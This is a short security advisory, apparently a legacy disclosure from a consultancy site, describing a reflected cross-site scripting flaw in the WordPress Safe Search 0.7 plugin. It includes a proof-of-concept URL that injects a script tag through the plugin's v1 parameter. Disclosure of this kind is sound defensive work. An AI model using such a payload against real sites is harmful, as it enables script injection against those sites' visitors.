Home
Consulting
Advisories
Software
Articles
Contact

WordPress Safe Search 0.7 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in WordPress Safe Search 0.7 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/wordpress/wp-content/plugins/wp-safe-search/wp-safe-search-jx.php?v1=%3Cscript%3Ealert(0)%3C/script%3E


Copyright © 2018 AutoSec Tools LLC